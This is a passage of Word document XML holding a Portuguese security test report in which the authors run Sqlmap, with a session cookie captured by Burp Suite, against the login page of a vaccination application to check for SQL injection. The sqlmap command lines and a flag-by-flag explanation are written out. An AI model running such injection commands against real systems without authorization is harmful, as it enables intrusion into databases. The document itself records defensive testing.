        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tarefa realizada no dia 11/04</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Duração: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">2 horas </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>e 30 min</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>utos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w: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Utilizar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> para automatizar o processo de detecção de vulnerabilidades na tela de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Login fazendo uso </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>injeção SQL.</w:t>
      </w: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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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  <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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>Tentativa 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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  <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Verificar se a tela de Login é vul</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nerável a injeção de código SQL. Caso haja vulnerabilidade, </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>conseguir obter o nome do banco de dados utilizado pelo sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00834FAA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  <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Para realizar essa ten</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>tativa foi necessário utilizar a ferramenta</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Burp Suite </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">para </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">capturar as informações </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">de cookie contidas no cabeçalho de requisição </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>momento em que a página do L</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ogin é acessada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00834FAA" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4050030"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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11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834FAA" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Figura 11-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>âmet</w:t>
      </w:r>
      <w:r w:rsidRPr="00834FAA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000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</w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00D32318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  <w:r w:rsidRPr="00D32318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00654DEF" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/vacina/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--cookie="PHSESSID=75ce718b37088517cafla733d53c60f"  -b  --current -db </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002719E7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“./sqlmap.py” comando utilizado para executar a ferramenta Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002719E7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“-u” utilizado</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> para especificar a URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002719E7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“--cookie” utilizado para especificar um cookie de sessão válido a ser passado para o Sqlmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="002719E7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>utilizado para obter o</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> nome do banco de dados utilizado pela aplicação</w:t>
      </w:r>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial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Esperava-se que a tela de Login não fosse vulnerável à injeção de SQL e consequentemente não fosse possível descobrir o nome do banco de dados utilizado pela aplicação.</w:t>
      </w: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ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b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ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002719E7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D32318">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Passou n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o teste. As figuras 12, 13 e 14 mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="00D32318" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4156710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12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Default="00EC5D2B" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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Figura 12</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado aplicação SQL Injection via Sqlmap. Parte 1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-142"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-142"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-142"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="-142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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="4005580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3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Default="00EC5D2B" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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Figura 13</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado aplicação SQL Injection via Sqlmap. Parte 2.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC5D2B" w:rsidRPr="001B2F09" w:rsidRDefault="00EC5D2B" w:rsidP="00EC5D2B">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252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  <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5476240" cy="4076700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14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1B2F09" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00EC5D2B" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="160" w:line="252" w:lineRule="auto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Figura 14</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Resultado aplicação SQL Injection via Sqlmap. Parte 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09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b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09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Repetir a ação da tentativa 1</w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aumentar o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">nível de heurística aplicada pelo Sqlmap na injeção de SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>para o valor máximo: 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="001B2F09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  <w:r w:rsidRPr="001B2F09">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Entrada: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00654DEF" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>./Sqlmap.py -u "</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00654DEF">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://IP_do_servidor/vacina/login.php?logado=false</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>" –b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="252" w:lineRule="auto"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
